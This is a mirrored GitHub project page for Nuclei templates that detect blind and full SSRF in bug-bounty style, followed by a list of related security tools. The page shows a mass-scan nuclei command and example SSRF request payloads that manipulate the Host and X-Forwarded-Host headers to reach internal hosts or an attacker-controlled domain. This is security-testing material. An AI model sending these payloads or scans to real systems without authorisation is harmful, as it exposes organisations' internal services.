GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → 0xAwali → Blind-SSRF

0xAwali / Blind-SSRF

Licence: other
Nuclei Templates to reproduce Cracking the lens's Research

Labels

web-securitynucleibugbountyssrfnuclei-templatesblindssrf

Projects that are alternatives of or similar to Blind-SSRF

Virtual-Host
Modified Nuclei Templates Version to FUZZ Host Header
Stars: ✭ 38 (-65.77%)
Mutual labels:  web-security, nuclei, bugbounty, ssrf, nuclei-templates
nerdbug
Full Nuclei automation script with logic explanation.
Stars: ✭ 153 (+37.84%)
Mutual labels:  nuclei, bugbounty, nuclei-templates
cent
Community edition nuclei templates, a simple tool that allows you to organize all the Nuclei templates offered by the community in one place
Stars: ✭ 315 (+183.78%)
Mutual labels:  nuclei, bugbounty, nuclei-templates
Bbrecon
Python library and CLI for the Bug Bounty Recon API
Stars: ✭ 169 (+52.25%)
Mutual labels:  web-security, bugbounty
ncl
nuclei framework scripts
Stars: ✭ 25 (-77.48%)
Mutual labels:  nuclei, nuclei-templates
Priest
Extract server and IP address information from Browser SSRF
Stars: ✭ 13 (-88.29%)
Mutual labels:  bugbounty, ssrf
Eagle
Multithreaded Plugin based vulnerability scanner for mass detection of web-based applications vulnerabilities
Stars: ✭ 85 (-23.42%)
Mutual labels:  bugbounty, ssrf
Minesweeper
A Burpsuite plugin (BApp) to aid in the detection of scripts being loaded from over 23000 malicious cryptocurrency mining domains (cryptojacking).
Stars: ✭ 162 (+45.95%)
Mutual labels:  web-security, bugbounty
continuous-nuclei
Running nuclei Continuously
Stars: ✭ 45 (-59.46%)
Mutual labels:  nuclei, bugbounty
my-nuclei-templates
Some contributions in the nuclei-templates repository
Stars: ✭ 32 (-71.17%)
Mutual labels:  nuclei, nuclei-templates
requests-ip-rotator
A Python library to utilize AWS API Gateway's large IP pool as a proxy to generate pseudo-infinite IPs for web scraping and brute forcing.
Stars: ✭ 323 (+190.99%)
Mutual labels:  web-security, bugbounty
WDIR
Good resources about web security that I have read.
Stars: ✭ 14 (-87.39%)
Mutual labels:  web-security, bugbounty
magicRecon
MagicRecon is a powerful shell script to maximize the recon and data collection process of an objective and finding common vulnerabilities, all this saving the results obtained in an organized way in directories and with various formats.
Stars: ✭ 478 (+330.63%)
Mutual labels:  nuclei, bugbounty
ObserverWard 0x727
Cross platform community web fingerprint identification tool
Stars: ✭ 529 (+376.58%)
Mutual labels:  nuclei, nuclei-templates
Resources For Beginner Bug Bounty Hunters
A list of resources for those interested in getting started in bug bounties
Stars: ✭ 7,185 (+6372.97%)
Mutual labels:  web-security, ssrf
Pinaak
A vulnerability fuzzing tool written in bash, it contains the most commonly used tools to perform vulnerability scan
Stars: ✭ 69 (-37.84%)
Mutual labels:  nuclei, bugbounty
leaky-paths
A collection of special paths linked to major web CVEs, known misconfigurations, juicy APIs ..etc. It could be used as a part of web content discovery, to scan passively for high-quality endpoints and quick-wins.
Stars: ✭ 507 (+356.76%)
Mutual labels:  nuclei, bugbounty
Favfreak
Making Favicon.ico based Recon Great again !
Stars: ✭ 564 (+408.11%)
Mutual labels:  web-security, bugbounty
Awesome Bugbounty Tools
A curated list of various bug bounty tools
Stars: ✭ 96 (-13.51%)
Mutual labels:  web-security, bugbounty
Domxssscanner
DOMXSS Scanner is an online tool to scan source code for DOM based XSS vulnerabilities
Stars: ✭ 181 (+63.06%)
Mutual labels:  web-security
View All Similar Projects ➔

Nuclei Templates to reproduce Cracking the lens's Research

Requirements

1 - Read and Watch !

Cracking the lens's Research

2 - Install Nuclei

Nuclei

3 - Clone this Repository

Blind SSRF

Usage

sed -i -- 's/- "Your Match"/- "Match Response of Your Domain e.g. <title>Title My Server 0xAwali<\/title>"/' *.yaml
nuclei -c 300 -list url.txt -bulk-size 50 -retries 3 -timeout 20 -t "/Templates/*.yaml" -var "MY-DOMAIN=domain.com"

Keep in Your Mind

don't use {{interactsh-url}} because I noticed a lot of Interaction will take time to happen so You will miss a lot

Next Step !

if nuclei matched something , now You have completely SSRF

if nuclei didn't match anything but there is HTTP Interaction happen , now maybe You have Blind SSRF

so try to invest some time and use this blog as reference

assetnote

A Glossary of Blind SSRF Chains

Results

1 - Completely SSRF

GET http://internal-domains.company.com/ HTTP/1.1
Host: company.com
Cache-Control: no-transform
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept-Encoding: gzip, deflate
Accept: */*

SSRF

SSRF

SSRF

SSRF 

GET http://internal-domains.company.com/ HTTP/1.0
Cache-Control: no-transform
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept-Encoding: gzip, deflate
Accept: */*

2 - Blind SSRF but there isn't luck to hit internal services

GET / HTTP/1.1
Host: company.com @MY-Domain #did you notice that there is a space between company.com and @
Cache-Control: no-transform
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept-Encoding: gzip, deflate
Accept: */*

SSRF

SSRF 

GET / HTTP/1.1
Host: company.com
X-Forwarded-Host: MY-Domain/.company.com
Cache-Control: no-transform
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept-Encoding: gzip, deflate
Accept: */*
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].